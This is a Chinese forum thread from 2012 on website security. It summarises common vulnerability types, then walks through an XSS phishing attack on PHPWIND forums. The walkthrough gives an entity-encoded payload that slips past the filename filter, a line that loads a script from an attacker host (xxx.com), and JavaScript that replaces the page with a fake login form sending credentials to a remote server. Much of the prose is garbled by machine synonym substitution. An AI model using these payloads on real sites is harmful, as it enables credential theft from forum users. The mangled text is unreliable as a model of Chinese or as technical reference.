找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1098|回复: 1

网站安全给我个人信息的重要性

[复制链接]

31

主题

5

回帖

219

牛毛

一级牛人

积分
219
发表于 2012-10-26 13:41:32 | 显示全部楼层 |阅读模式 来自 山东省济南市
从2011年末的泄密门,到2012新年才刚刚曩昔的短短一个月时间里发作的一切和网络安全关联的抢手事情,黑客带给了咱们太多的震慑。当你翻开baidu新闻查找“黑客”关键词时能看到什么?没错,有太多闻名的网站被黑客攻破,有太多牛X的IT体系对黑客来说如入无人之境……   
    进入WEB2.0年代,咱们的IT确实变得如此软弱了吗?记住在一次有关安全的研讨会上,有教授谈到了这样的观念:互联网在描绘之初,也没能预想到互联网会开展成如今的巨大规划,若是互联网仍然只应用于教育网、科研网,就不会有这么多的问题,莫非咱们真得需要在从头织一张网?尽管这仅仅一种假定,也可能是将来立异的一个星星之火,但在现阶段,仍是让咱们回收思维的同党,来处置实践中的问题吧!
  
    网站安全在阅历了2011年末的泄密门之后,得到了各方面的注重,互联网公司开端从头审视本身的安全性、安全厂商开端更多的重视这方面的问题并推出了相应的处置方案、政府也在从法律法规方面临网站安全进行了关联的规则(未证明音讯:中国的萨班斯法案在本年也将出台)。
  
    近来,小编从国内闻名的缝隙陈述平台WooYun.org上得到了以下几张图,图中标示的是各公司网站所存在的缝隙类型和形成体系缝隙的首要原因:
0.jpg
▲点击图片检查大图
  
    从上图咱们可以不难找出公司网站存在安全危险的几个同共点:XSS跨站脚本进犯、SQL写入缝隙、后台弱口令、体系/效劳运维装备不妥以及体系/效劳补丁不及时……下面咱们就从这首要的几点开端和咱们一同讨论:

    1、 XSS跨站脚本进犯

  
     上图所列出的互联网公司有门户网站、职业网站、视频网站、旅行网站等,从不同类型的网站咱们可以看出,XSS跨站脚本进犯是黑客运用最遍及的进犯方法,这里咱们为咱们整理了XSS跨站脚本进犯的原理,期望能对咱们有协助。

    小白一下:
XSS又名CSS (Cross Site Script) ,跨站脚本进犯。它指的是歹意进犯者往Web页面里刺进歹意html代码,当用户阅读该页之时,嵌入其间Web里面的html代码会被履行,然后到达歹意用户的特别意图。XSS归于被迫式的进犯,由于其被迫且不好使用,所以许多人常呼略其危害性。
  
    跨站脚本进犯最大的魅力是经过HTML写入绑架用户的阅读器,恣意结构用户当时阅读的HTML内容,乃至可以模仿用户当时的操作。这里分析一种新式进犯办法:XSS Phishing(跨站脚本垂钓进犯),使用这种方法可以直接盗取用户的暗码,下面我就拿比来PHPWIND论坛所暴出的XSS做一下演示,PHPWIND对上传文件名没有处置严厉,招致可以写入跨站脚本。
  
    先做一个简略的测验,发一篇新帖,在附件中随意写入一个本地途径加带“<” 和“>”的文件名,如图一
1.jpg
  
    发帖成功后咱们会发现,帖子附件名现已没有了,如图二
2.jpg
  
    咱们检查当时页面的源代码会发现现已写到页面内,如图三
3.jpg
  
    当然要写入脚本,PHPWIND仍是做了约束,文件名中呈现"(","/"字符将会被过滤,不过可以使用HTML转码的方法绕过这个约束,如转换成


4.jpg <TABLE BACKGROUND=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#47&#120&#115&#115&#47&#41>

  
    这样咱们现已完成了跨站脚本的写入,关键是怎样完成进犯,这一处跨站脚本缝隙进行了HTML转码,咱们不方便写入过长的内容,那么就加载一个JS文件,动态创立一个script符号,代码如下:


5.jpg <TABLE BACKGROUND=javascript:s=document.createElement("script");s.src="http://xxx.com/xss.js";document.body.appendChild(s);>


  OK,到了这一步咱们就可以在JS中恣意结构咱们的进犯代码,进犯的思路是当用户拜访帖子,使用脚本清空当时页面,然后从头写成垂钓页面。
  
    首要咱们可以试验一下,javacript有一个小特性,延时输出将会清空当时页面一切的内容,代码如下:

6.jpg function Phish(){
7.jpg info
= "我是来垂钓的!"
8.jpg document.write(info);
9.jpg }
10.jpg
function doit(){
11.jpg setTimeout(
"Phish()", 1000 );
12.jpg }doit()


  
    如图四,帖子页面的代码和内容全变成了“我是来垂钓的!”

13.jpg
  
    想一想,若是咱们把info变量的内容变成HTML代码会怎样,如图五

14.jpg
  
    嘿嘿,凶恶一点!咱们完全可以把页面变成一个本人操作的登录页面,将表单的值指向长途效劳器上的顺序,如图六
15.jpg
  
    然后长途效劳器上的顺序将承受表单POST的用户和暗码,当然咱们可以做奇妙点,让其拜访后又转跳回论坛主页,代码如下:

16.jpg
  

9

主题

344

回帖

189

牛毛

一级牛人

积分
189
发表于 2012-10-27 09:50:10 | 显示全部楼层 来自 上海市
也没能预想到互联网会开展成如今的巨大规划,若是互联网仍然只应用于教育网
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-25 23:59 , Processed in 0.152082 second(s), 41 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表